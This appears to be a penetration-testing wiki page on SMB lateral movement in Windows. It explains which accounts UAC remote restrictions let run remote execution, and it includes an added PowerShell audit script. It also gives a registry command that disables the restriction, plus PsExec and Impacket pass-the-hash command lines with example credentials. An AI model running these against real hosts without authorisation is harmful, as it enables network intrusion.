# SMB protocol

## Introduction

Lateral movement consists of techniques that enable an attacker to access and control remote systems. The SMB protocol is a well-known candidate for this purpose, which is also why the remote execution it enables is worth understanding from the defensive side.

## Requirements

### Definitions

There are 5 types of users:

* Local users
  * With admin privileges on the machine
    * RID500
    * Non-RID500
  * Without admin privileges on the machine
* Domain users
  * With admin privileges on machines
  * Without admin privileges on machines

{% hint style="info" %}
RID 500 is the built-in local administrator account used for installation or recovery purposes (usually named Administrator).
{% endhint %}

### UAC remote restrictions

Judging from [microsoft](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows) and [harmj0y](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/), we can say the following:

* Local admin privileges are **required** to WmiExec or PsExec
* Non-RID 500 local admin accounts **cannot** WmiExec or PsExec on Windows Vista and later machines, because UAC remote restrictions give them a filtered (non-admin) token over the network
* Domain users with admin privileges on the machine **can**
* The RID 500 local admin account **can** WmiExec or PsExec on machines, since it is exempt from that filtering by default

|                                                 | PsExec, WmiExec, SmbExec, AtExec, etc. |
| ----------------------------------------------- | -------------------------------------- |
| Local users (no admin privileges)               | No                                     |
| Local admins (non-RID 500)                      | No                                     |
| Local admin RID 500                             | **Yes**                                |
| Domain users **without** local admin privileges | No                                     |
| Domain users **with** local admin privileges    | **Yes**                                |

{% hint style="info" %}
**To allow non-RID 500 local admin accounts to perform WmiExec or PsExec, execute:**

```bash
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /f /d 1
```

Note that this disables the UAC remote restriction, so the credentials (or hashes) of every local admin account on the machine become usable for remote execution, not just those of RID 500.

**To prevent RID 500 from being able to WmiExec or PsExec, execute:**

```bash
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v FilterAdministratorToken /t REG_DWORD /f /d 1
```
{% endhint %}
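As an added defender-side check that is not part of the original page, the following PowerShell reads the two policy values described above and reports which local accounts the UAC remote restrictions currently leave usable for PsExec/WmiExec-style remote execution on the host. The cmdlets are standard Windows ones; the output field names are my own, and it assumes it is run from an elevated local shell.

```powershell
# Added audit example (not from the original page): evaluates the UAC remote
# restriction state of this host as described in the Microsoft KB it cites.
$Key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'

function Get-PolicyValue {
    param([string]$Name)
    # A missing value means "default"; ErrorAction keeps the lookup from throwing.
    $item = Get-ItemProperty -Path $Key -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

$tokenFilter = Get-PolicyValue 'LocalAccountTokenFilterPolicy'  # absent/0 = filtered (default)
$adminFilter = Get-PolicyValue 'FilterAdministratorToken'       # absent/0 = RID 500 exempt (default)

# Default behaviour: non-RID 500 local admins receive a filtered token over the
# network; the built-in RID 500 account does not unless FilterAdministratorToken = 1.
$nonRid500Remote = ($tokenFilter -eq 1)
$rid500Remote    = ($adminFilter -ne 1)

# Find RID 500 by SID suffix so a renamed built-in Administrator is still identified.
$rid500 = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }

# Other local (not domain) user accounts in the local Administrators group.
$otherAdmins = Get-LocalGroupMember -Group 'Administrators' -ErrorAction SilentlyContinue |
    Where-Object {
        $_.ObjectClass -eq 'User' -and
        $_.PrincipalSource -eq 'Local' -and
        $_.SID.Value -notlike 'S-1-5-21-*-500'
    }

[PSCustomObject]@{
    Host                               = $env:COMPUTERNAME
    LocalAccountTokenFilterPolicy      = $tokenFilter
    FilterAdministratorToken           = $adminFilter
    Rid500Account                      = $rid500.Name
    Rid500Enabled                      = $rid500.Enabled
    Rid500UsableRemotely               = ($rid500Remote -and $rid500.Enabled)
    NonRid500LocalAdminsUsableRemotely = $nonRid500Remote
    NonRid500LocalAdmins               = ($otherAdmins.Name -join ', ')
}
```

A host reporting `NonRid500LocalAdminsUsableRemotely = True`, or an enabled RID 500 account with `Rid500UsableRemotely = True`, is one where a leaked local admin password or NT hash is sufficient for the remote execution tools listed below.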

## Tools

### PsExec

On Windows, use Sysinternals PsExec:

```bash
PsExec64.exe \\WIN01 -accepteula -s -u localadmin -p L0c4l4dm1n "cmd"
PsExec64.exe \\192.168.10.60 -accepteula -s -u localadmin -p b26906d7457cbe74931011c3c5d1ac92 "cmd"
```

On Kali, use Impacket's PsExec:

```bash
psexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "cmd"
psexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "cmd"
```

### WmiExec

On Kali, use Impacket's WmiExec:

```bash
wmiexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"
```

### AtExec

On Kali, use Impacket's AtExec:

```bash
atexec.py ./localadmin:L0c4l4dm1n@192.168.10.60 "ipconfig"
atexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60 "ipconfig"
```

### SmbExec

On Kali, use Impacket's SmbExec:

```bash
smbexec.py ./localadmin:L0c4l4dm1n@192.168.10.60
smbexec.py -hashes aad3b435b51404eeaad3b435b51404ee:209c6174da490caeb422f3fa5a7ae634 ./aasadmin@192.168.10.60
```

## References

* [microsoft](https://support.microsoft.com/en-us/help/951016/description-of-user-account-control-and-remote-restrictions-in-windows)
* [harmj0y](https://www.harmj0y.net/blog/redteaming/pass-the-hash-is-dead-long-live-localaccounttokenfilterpolicy/)
